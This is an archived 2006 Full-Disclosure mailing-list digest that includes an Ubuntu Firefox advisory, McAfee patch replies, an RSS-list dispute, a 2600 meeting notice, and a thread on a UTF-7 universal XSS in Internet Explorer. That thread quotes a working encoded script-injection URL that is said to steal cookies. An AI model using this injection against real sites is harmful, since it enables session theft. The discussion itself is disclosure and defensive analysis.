available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061002/802ca7b9/attachment.bin From eaton.lists at gmail.com Mon Oct 2 14:44:27 2006 From: eaton.lists at gmail.com (Brian Eaton) Date: Mon, 2 Oct 2006 09:44:27 -0400 Subject: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053]) In-Reply-To: <200610021236.k92CaKZO014965@asti.maths.usyd.edu.au> References: <200610021236.k92CaKZO014965@asti.maths.usyd.edu.au> Message-ID: <242a0a8f0610020644x37f26acate234bf012073e457@mail.gmail.com> On 10/2/06, Paul Szabo wrote: > This provides UXSS (Universal Cross-Site Scripting): > > http://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ... > > (with a couple of hundred Zs) will do what we want. Works for https also: > > https://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ... > > Can steal any Apache server (http or https) cookies. I do not have easy > access to ISS servers to test whether similar attacks would work there. > > Will Apache fix (carefully escape) the error message? Will MS fix IE to > not be so over-friendly? This should only be possible if neither the HTTP headers nor the HTML page specifies the character set of the document. If the server doesn't tell IE the character set, the autodetection "feature" will kick in, and the site is vulnerable. I just tested Apache 1.3.37 and Apache 2.2.3, and both specified a content-type header of "text/html; charset=iso-8859-1" for 404 responses, so the attack failed. My browser was IE 6.0.2800.1106. I'm guessing that you tested a server wth some kind of customized 404 response that neglected to include a charset specification. That's not a vulnerability in Apache, that is poor site configuration. (I do wish that IE didn't have this character set autodetection feature, or at least that it was restricted to commonly used character sets that don't use strange encodings for HTML metacharacters.) Regards, Brian From martin.pitt at canonical.com Mon Oct 2 16:09:51 2006 From: martin.pitt at canonical.com (Martin Pitt) Date: Mon, 2 Oct 2006 17:09:51 +0200 Subject: [Full-disclosure] [USN-354-1] Firefox vulnerabilities Message-ID: <20061002150951.GC4662@piware.de> =========================================================== Ubuntu Security Notice USN-354-1 October 02, 2006 firefox vulnerabilities CVE-2006-3113, CVE-2006-3677, CVE-2006-3801, CVE-2006-3802, CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-2006-3810, CVE-2006-3811, CVE-2006-3812, CVE-2006-4253, CVE-2006-4340, CVE-2006-4565, CVE-2006-4566, CVE-2006-4567, CVE-2006-4568, CVE-2006-4569, CVE-2006-4571 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: firefox 1.5.dfsg+1.5.0.7-0ubuntu5.10.3 firefox-dom-inspector 1.5.dfsg+1.5.0.7-0ubuntu5.10.3 firefox-gnome-support 1.5.dfsg+1.5.0.7-0ubuntu5.10.3 devhelp 0.10-1ubuntu2.1 devhelp-common 0.10-1ubuntu2.1 epiphany-browser 1.8.2-0ubuntu1.1 epiphany-browser-dev 1.8.2-0ubuntu1.1 gnome-app-install 0+20051005.1 libdevhelp-1-0 0.10-1ubuntu2.1 libdevhelp-1-dev 0.10-1ubuntu2.1 mozilla-firefox-locale-af-za 1.5-ubuntu5.10-1 mozilla-firefox-locale-ast-es 1.5-ubuntu5.10-1 mozilla-firefox-locale-bg-bg 1.5-ubuntu5.10-1 mozilla-firefox-locale-cs-cz 1.5-ubuntu5.10-1 mozilla-firefox-locale-da-dk 1.5-ubuntu5.10-1 mozilla-firefox-locale-de 1.5-ubuntu5.10-1 mozilla-firefox-locale-de-de 1.5-ubuntu5.10-1 mozilla-firefox-locale-en-gb 1.5-ubuntu5.10-1 mozilla-firefox-locale-es 1.5-ubuntu5.10-1 mozilla-firefox-locale-es-ar 1.5-ubuntu5.10-1 mozilla-firefox-locale-es-es 1.5-ubuntu5.10-1 mozilla-firefox-locale-fi-fi 1.5-ubuntu5.10-1 mozilla-firefox-locale-fr 1.5-ubuntu5.10-1 mozilla-firefox-locale-fr-fr 1.5-ubuntu5.10-1 mozilla-firefox-locale-ga-ie 1.5-ubuntu5.10-1 mozilla-firefox-locale-gu-in 1.5-ubuntu5.10-1 mozilla-firefox-locale-he-il 1.5-ubuntu5.10-1 mozilla-firefox-locale-hu-hu 1.5-ubuntu5.10-1 mozilla-firefox-locale-mk-mk 1.5-ubuntu5.10-1 mozilla-firefox-locale-nl-nl 1.5-ubuntu5.10-1 mozilla-firefox-locale-pa-in 1.5-ubuntu5.10-1 mozilla-firefox-locale-pl 1.5-ubuntu5.10-1 mozilla-firefox-locale-pl-pl 1.5-ubuntu5.10-1 mozilla-firefox-locale-pt-br 1.5-ubuntu5.10-1 mozilla-firefox-locale-pt-pt 1.5-ubuntu5.10-1 mozilla-firefox-locale-ro-ro 1.5-ubuntu5.10-1 mozilla-firefox-locale-ru-ru 1.5-ubuntu5.10-1 mozilla-firefox-locale-sl-si 1.5-ubuntu5.10-1 mozilla-firefox-locale-sq-al 1.5-ubuntu5.10-1 mozilla-firefox-locale-sv 1.5-ubuntu5.10-1 mozilla-firefox-locale-sv-se 1.5-ubuntu5.10-1 mozilla-firefox-locale-tr-tr 1.5-ubuntu5.10-1 mozilla-firefox-locale-xh-za 1.5-ubuntu5.10-1 mozilla-firefox-locale-zh-cn 1.5-ubuntu5.10-1 mozilla-firefox-locale-zh-tw 1.5-ubuntu5.10-1 yelp 2.12.1-0ubuntu1.1 After a standard system upgrade you need to restart Firefox to effect the necessary changes. Since the 1.0.x series of Firefox is not supported any more, this update introduces the firefox 1.5 series into Ubuntu 5.10. Please check whether all your extensions still work as expected. Details follow: Various flaws have been reported that allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious URL. (CVE-2006-3113, CVE-2006-3677, CVE-2006-3801, CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3809, CVE-2006-3811, CVE-2006-3812, CVE-2006-4253, CVE-2006-4565, CVE-2006-4566, CVE-2006-4568, CVE-2006-4569 CVE-2006-4571) Cross-site scripting vulnerabilities were found in the XPCNativeWrapper() function and native DOM method handlers. A malicious web site could exploit these to modify the contents or steal confidential data (such as passwords) from other opened web pages. (CVE-2006-3802, CVE-2006-3810) A bug was found in the script handler for automatic proxy configuration. A malicious proxy could send scripts which could execute arbitrary code with the user's privileges. (CVE-2006-3808) The NSS library did not sufficiently check the padding of PKCS #1 v1.5 signatures if the exponent of the public key is 3 (which is widely used for CAs). This could be exploited to forge valid signatures without the need of the secret key. (CVE-2006-4340) Jon Oberheide reported a way how a remote attacker could trick users into downloading arbitrary extensions with circumventing the normal SSL certificate check. The attacker would have to be in a position to spoof the victim's DNS, causing them to connect to sites of the attacker's choosing rather than the sites intended by the victim. If they gained that control and the victim accepted the attacker's cert for the Mozilla update site, then the next update check could be hijacked and redirected to the attacker's site without detection. (CVE-2006-4567) Packages which embed or extend Firefox have been updated to work with the new version. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.7-0ubuntu5.10.3.diff.gz Size/MD5: 175367 a26d52d72d57fa4447cdc6c4d8120d9e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.7-0ubuntu5.10.3.dsc Size/MD5: 1056 b9d557cd0d8d2105dde2c669d958ac18 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.7.orig.tar.gz Size/MD5: 43116523 025ca9a48809d142dd4817e396157afa http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.10-1ubuntu2.1.diff.gz Size/MD5: 12508 2d1f8e2d37966901a16125834c48a5ae http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.10-1ubuntu2.1.dsc Size/MD5: 1674 50224ab103882c85e8584773f70d0b0b http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.10.orig.tar.gz Size/MD5: 532744 79e71acb839ca504f37cccf2e520abe1 http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_1.8.2-0ubuntu1.1.diff.gz Size/MD5: 13906 7351cceba02fb251087d19c9fada3539 http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_1.8.2-0ubuntu1.1.dsc Size/MD5: 2223 f1784da472d75a158d5008b72db78c29 http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_1.8.2.orig.tar.gz Size/MD5: 4657374 2232bfd4090f9f9187c84bc46f785471 http://security.ubuntu.com/ubuntu/pool/main/g/gnome-app-install/gnome-app-install_0+20051005.1.dsc Size/MD5: 616 5b63f100196cc122a0d14fb10128fe0a http://security.ubuntu.com/ubuntu/pool/main/g/gnome-app-install/gnome-app-install_0+20051005.1.tar.gz Size/MD5: 2722120 c1b93c90799172e7939737b685849028 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-all_1.5-ubuntu5.10-1.diff.gz Size/MD5: 17550 75aba6066f369b482725b6ecafe351b5 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-all_1.5-ubuntu5.10-1.dsc Size/MD5: 1711 8643261713bcaededc638c59ddb5a639 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-all_1.5-ubuntu5.10.orig.tar.gz Size/MD5: 3834374 cbb9bc1c91c73b100a134ffef3527575 http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.12.1-0ubuntu1.1.diff.gz Size/MD5: 10203 52a694c6ae7dd1b2cf47d23fa405cb32 http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.12.1-0ubuntu1.1.dsc Size/MD5: 1716 a81a9690f6ae9313f143764f1577353e http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.12.1.orig.tar.gz Size/MD5: 1126243 8e4a9cdacb146ee9094281a2a809de1b Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_all.deb Size/MD5: 49450 a96a7f73505926f9670b5db1507d8a63 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_all.deb Size/MD5: 50340 822d93a2f02f32e0c4b05e6a0d18d251 http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp-common_0.10-1ubuntu2.1_all.deb Size/MD5: 42554 d3a1266307910c8d97cf0a61765f6be6 http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser-dev_1.8.2-0ubuntu1.1_all.deb Size/MD5: 155316 985cbd3ceba8913d1c6b658634f5515f http://security.ubuntu.com/ubuntu/pool/main/g/gnome-app-install/gnome-app-install_0+20051005.1_all.deb Size/MD5: 2363516 2951dc5a3fa5363484a2ded4e9d63525 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-af-za_1.5-ubuntu5.10-1_all.deb Size/MD5: 14920 3d8b3b0207b6dbbd50a18f44124be44d http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-ast-es_1.5-ubuntu5.10-1_all.deb Size/MD5: 14922 ce395b5cb94745bccc6d339aeaa47af6 http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-bg-bg_1.5-ubuntu5.10-1_all.deb Size/MD5: 177054 301d8b790f931e8fced7d729462b119f http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-cs-cz_1.5-ubuntu5.10-1_all.deb Size/MD5: 167818 1130c3f572b0c3212e19db196869e6c1 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-da-dk_1.5-ubuntu5.10-1_all.deb Size/MD5: 156822 16dd2084e870f2b103e31475bab8fbc2 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-de-de_1.5-ubuntu5.10-1_all.deb Size/MD5: 156254 ec05416b5cf4a1404834a91aa7780636 http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-de_1.5-ubuntu5.10-1_all.deb Size/MD5: 14948 47a942dd614f3690468ace7dfce944a4 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-en-gb_1.5-ubuntu5.10-1_all.deb Size/MD5: 153066 c6ef3d6a1796a7187064d8dd8efade2d http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-es-ar_1.5-ubuntu5.10-1_all.deb Size/MD5: 160414 c2d04fa793a6c8537921825ad9d3fed3 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-es-es_1.5-ubuntu5.10-1_all.deb Size/MD5: 146512 7c879206052a84628f2cb1dba61225a2 http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-es_1.5-ubuntu5.10-1_all.deb Size/MD5: 14962 45b0b022da96d82426e0379789e76115 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-fi-fi_1.5-ubuntu5.10-1_all.deb Size/MD5: 157538 dc7d6ba83a34dc635d5ba13a6e00fb85 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-fr-fr_1.5-ubuntu5.10-1_all.deb Size/MD5: 218898 08bac23bc1814781169971c79e340029 http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-fr_1.5-ubuntu5.10-1_all.deb Size/MD5: 14952 cc5d3ba9021d9c7935e88820c3b1cb22 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-ga-ie_1.5-ubuntu5.10-1_all.deb Size/MD5: 159686 6e7cfaad656bd78d391e87d3efdaf15c http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-gu-in_1.5-ubuntu5.10-1_all.deb Size/MD5: 176464 071b3ed411c73bd2e4b3de929c59e17a http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-he-il_1.5-ubuntu5.10-1_all.deb Size/MD5: 159710 61f6d12b159c9769ec245cafd3a44416 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-hu-hu_1.5-ubuntu5.10-1_all.deb Size/MD5: 168628 ff688d627228681bd3578e4193ec85bc http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-mk-mk_1.5-ubuntu5.10-1_all.deb Size/MD5: 176372 b2d833c6ec5a6a7be6d65cbcd852d4d6 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-nl-nl_1.5-ubuntu5.10-1_all.deb Size/MD5: 166614 2ad5e24d1ab820968e352198acafe73b http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-pa-in_1.5-ubuntu5.10-1_all.deb Size/MD5: 166320 4a3310c669c84b411c556de9be00c9ae http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-pl-pl_1.5-ubuntu5.10-1_all.deb Size/MD5: 256734 8fd75e6450ea6c262259d3f5c97ed0d6 http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-pl_1.5-ubuntu5.10-1_all.deb Size/MD5: 14950 d9e41ad5ebd9fa22e4e6368ccdb84e56 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-pt-br_1.5-ubuntu5.10-1_all.deb Size/MD5: 158306 2ebf181536dfc4fabf7264459d8168d9 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-pt-pt_1.5-ubuntu5.10-1_all.deb Size/MD5: 14918 cde145bb4308469314341fdce0df4150 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-ro-ro_1.5-ubuntu5.10-1_all.deb Size/MD5: 157404 74e2fda0bbddc1ae9494d971b8b94000 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-ru-ru_1.5-ubuntu5.10-1_all.deb Size/MD5: 184988 10a5c4a5bfbbb5564e512f307d3affd0 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-sl-si_1.5-ubuntu5.10-1_all.deb Size/MD5: 159592 a12d61905553ac247cdd5cabfbea8266 http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-sq-al_1.5-ubuntu5.10-1_all.deb Size/MD5: 14920 3cf47efcf547af1eefcb9a37468d9264 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-sv-se_1.5-ubuntu5.10-1_all.deb Size/MD5: 169870 60dd6cd5b9c870fc03bd89d8ad8ba68b http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-sv_1.5-ubuntu5.10-1_all.deb Size/MD5: 14952 716f89f697d527336ddc754422b61f9e http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-tr-tr_1.5-ubuntu5.10-1_all.deb Size/MD5: 150822 e655fabf918cde4d5dbec858198dfc2b http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-xh-za_1.5-ubuntu5.10-1_all.deb Size/MD5: 14924 5d0a3d18420c2dceb9943098b1cc5edb http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-zh-cn_1.5-ubuntu5.10-1_all.deb Size/MD5: 150806 2bf7032ceccd2f2691d4210711ce533b http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-zh-tw_1.5-ubuntu5.10-1_all.deb Size/MD5: 141592 c4ab2103bcd210600bf2180b57e4c0a4 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_amd64.deb Size/MD5: 3151994 d6fbafaa57ddf56a5d2c15d0d0b7a54a http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_amd64.deb Size/MD5: 216360 ada223fd220cc75f1cf061cd44294a1c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_amd64.deb Size/MD5: 82664 be7890c0fa145f6a1e76e9abdbfd500f http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_amd64.deb Size/MD5: 10222068 bccb7d71de1abbe3036fe130d5f5d1a0 http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.10-1ubuntu2.1_amd64.deb Size/MD5: 48324 ad3fbfef83d3cf097e377be6dd9e0f75 http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_1.8.2-0ubuntu1.1_amd64.deb Size/MD5: 2079044 4aee57db6320497c7739f70ef350f752 http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-0_0.10-1ubuntu2.1_amd64.deb Size/MD5: 72862 1e41cee42bd67a3dbe0aaf4d9b1d8bae http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-dev_0.10-1ubuntu2.1_amd64.deb Size/MD5: 71654 6a79359848bfa3324b9619db75431060 http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.12.1-0ubuntu1.1_amd64.deb Size/MD5: 229922 b1f9ca522767d93f64e59ada4fe01ec7 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_i386.deb Size/MD5: 3152010 59a8bc4edc49fcd2ec6a0b905ae3b4fe http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_i386.deb Size/MD5: 209884 8ec25aa9f564f83747edc4998a54a7e1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_i386.deb Size/MD5: 75022 1e84dccc6587ae34f3f201c21d15e8b6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_i386.deb Size/MD5: 8644430 4c998b81cbdd13cff81cbf77c18edf9b http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.10-1ubuntu2.1_i386.deb Size/MD5: 48072 c032680500dc8c5d47ef50cf458c8bb0 http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_1.8.2-0ubuntu1.1_i386.deb Size/MD5: 2036736 50122be5b65d5cbfe84a3f103be32100 http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-0_0.10-1ubuntu2.1_i386.deb Size/MD5: 69370 1b0c3dbdf68c4026c39e4a20cd32f4f1 http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-dev_0.10-1ubuntu2.1_i386.deb Size/MD5: 65234 838439c919084ee33c3f36a82d51d0a9 http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.12.1-0ubuntu1.1_i386.deb Size/MD5: 220626 2b86b96b577e9c67b68aeb92a37e7ef1 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_powerpc.deb Size/MD5: 3152066 ecbc956d8fdd0b70cda57dad123005af http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_powerpc.deb Size/MD5: 213294 e83df33479eb5a7c075394ad48c2686c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_powerpc.deb Size/MD5: 78272 3702fb290fc9a477f43b72372d9e9029 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_powerpc.deb Size/MD5: 9826234 5bedd17d1e16eff3e1876798e675350f http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.10-1ubuntu2.1_powerpc.deb Size/MD5: 49832 84caef479729caf65c18e90bc3f023a1 http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_1.8.2-0ubuntu1.1_powerpc.deb Size/MD5: 2056216 e384f64d7861c356659504e4c440be81 http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-0_0.10-1ubuntu2.1_powerpc.deb Size/MD5: 70986 15343da493ea42d99fc5a9ac63e398f6 http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-dev_0.10-1ubuntu2.1_powerpc.deb Size/MD5: 72078 e55e86a842651dddefef98ab21ddb106 http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.12.1-0ubuntu1.1_powerpc.deb Size/MD5: 225382 7f30ecd915d851c66791fbfddebb5c49 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061002/324b7327/attachment.bin From virus at nolog.org Mon Oct 2 14:26:04 2006 From: virus at nolog.org (virus at nolog.org) Date: Mon, 02 Oct 2006 15:26:04 +0200 Subject: [Full-disclosure] McAfee EPO Buffer Overflow In-Reply-To: <000f01c6e5c5$dbd20510$2100a8c0@kamau> References: <000f01c6e5c5$dbd20510$2100a8c0@kamau> Message-ID: <4521136C.2060806@nolog.org> Hi, muts wrote: > [-] Vendor Status > > Vendor was notified July 14th, 2006. ehm. and more: Advisory published: http://knowledge.mcafee.com/SupportSite/search.do?cmd=displayKC&docType=kc&externalId=8611438&sliceId=SAL_Public&dialogID=2997768&stateId=0%200%202995803 patch already provided. GTi From taosecurity at gmail.com Mon Oct 2 12:28:20 2006 From: taosecurity at gmail.com (Richard Bejtlich) Date: Mon, 2 Oct 2006 07:28:20 -0400 Subject: [Full-disclosure] Security Rss Feeds Message-ID: <120ef0530610020428wb4e80d6k76b0cd23f619e0f0@mail.gmail.com> crazy frog crazy frog wrote: > thanks all for sharing, > i found around 240+ list of various security related RSS Feeds. Get it here:- > http://www.secgeeks.infys.net/security_rss_feeds > > _CF That's an interesting list, especially since it's mine http://www.bloglines.com/public/TaoSecurity starting with the 23rd entry for Bloglines and continuing another 200+ entries. I knew people were republishing my blog with their name on my content. I didn't know they were doing the same with my Bloglines choices. Richard http://taosecurity.blogspot.com From chris at get-tuf.com Mon Oct 2 17:15:59 2006 From: chris at get-tuf.com (Chris Brown) Date: Mon, 2 Oct 2006 17:15:59 +0100 Subject: [Full-disclosure] McAfee EPO Buffer Overflow Message-ID: <000401c6e63e$0d5409d0$0300a8c0@gettuf001> [-] Vendor Status A patch has been posted to the McAfee.com download site.. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061002/9d81da6d/attachment.html From i.m.crazy.frog at gmail.com Mon Oct 2 17:52:16 2006 From: i.m.crazy.frog at gmail.com (crazy frog crazy frog) Date: Mon, 2 Oct 2006 22:22:16 +0530 Subject: [Full-disclosure] Security Rss Feeds In-Reply-To: <120ef0530610020428wb4e80d6k76b0cd23f619e0f0@mail.gmail.com> References: <120ef0530610020428wb4e80d6k76b0cd23f619e0f0@mail.gmail.com> Message-ID: <41011d980610020952n13061947g323dcf4f148a56c1@mail.gmail.com> yes i forgot to mention your name . On 10/2/06, Richard Bejtlich wrote: > crazy frog crazy frog wrote: > > > thanks all for sharing, > > i found around 240+ list of various security related RSS Feeds. Get it here:- > > http://www.secgeeks.infys.net/security_rss_feeds > > > > _CF > > That's an interesting list, especially since it's mine > > http://www.bloglines.com/public/TaoSecurity > > starting with the 23rd entry for Bloglines and continuing another 200+ entries. > > I knew people were republishing my blog with their name on my content. > I didn't know they were doing the same with my Bloglines choices. > > Richard > http://taosecurity.blogspot.com > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- --------------------------------------- http://www.secgeeks.com --------------------------------------- ting ding ting ding ting ding ting ding ting ding ding i m crazy frog :) "oh yeah oh yeah... another wannabe, in hackerland!!!" From steven.mcgrath at chigeek.com Mon Oct 2 17:21:11 2006 From: steven.mcgrath at chigeek.com (Steven McGrath) Date: Mon, 2 Oct 2006 11:21:11 -0500 Subject: [Full-disclosure] October Chicago 2600/DC312 Meeting Information Message-ID: <28326b7c0610020921y45b35d4ckf2a6c34f834c6f1f@mail.gmail.com> The October Chicago 2600/DC312 Meeting is near! The meeting will be this friday at the Neighborhood Boys and Girls Club and will feature much of the same usual fun that all of you have grown to expect! [Presentation Information] - 9.00pm - Installing and Configuring Snort (Maniac) [General Information] - Meeting Time: 7.00pm - Approx. 3-5am - Meeting Date: Friday, Oct. 6th - Place : 2501 W Irving Park Road, Chicago - More Info : http://chicago2600.net -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/calendar Size: 6406 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061002/2db14e59/attachment.bin -------------- next part -------------- A non-text attachment was scrubbed... Name: invite20061006T190000.ics Type: application/ics Size: 6512 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061002/2db14e59/attachment-0001.bin From pauls at utdallas.edu Mon Oct 2 18:41:32 2006 From: pauls at utdallas.edu (Paul Schmehl) Date: Mon, 02 Oct 2006 12:41:32 -0500 Subject: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053]) In-Reply-To: <242a0a8f0610020644x37f26acate234bf012073e457@mail.gmail.com> References: <200610021236.k92CaKZO014965@asti.maths.usyd.edu.au> <242a0a8f0610020644x37f26acate234bf012073e457@mail.gmail.com> Message-ID: --On October 2, 2006 9:44:27 AM -0400 Brian Eaton wrote: > > I'm guessing that you tested a server wth some kind of customized 404 > response that neglected to include a charset specification. That's > not a vulnerability in Apache, that is poor site configuration. > Brian, a question for clarification. When you say "customized 404 response", you are not referring to a customized error document (as described briefly in the httpd.conf file) but rather to having changed the headers that the server returns when queried with a GET request, correct? And wouldn't this require changing source code and compiling a custom build of apache? Paul Schmehl (pauls at utdallas.edu) Adjunct Information Security Officer The University of Texas at Dallas http://www.utdallas.edu/ir/security/ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pkcs7-signature Size: 4085 bytes Desc: not available Url : 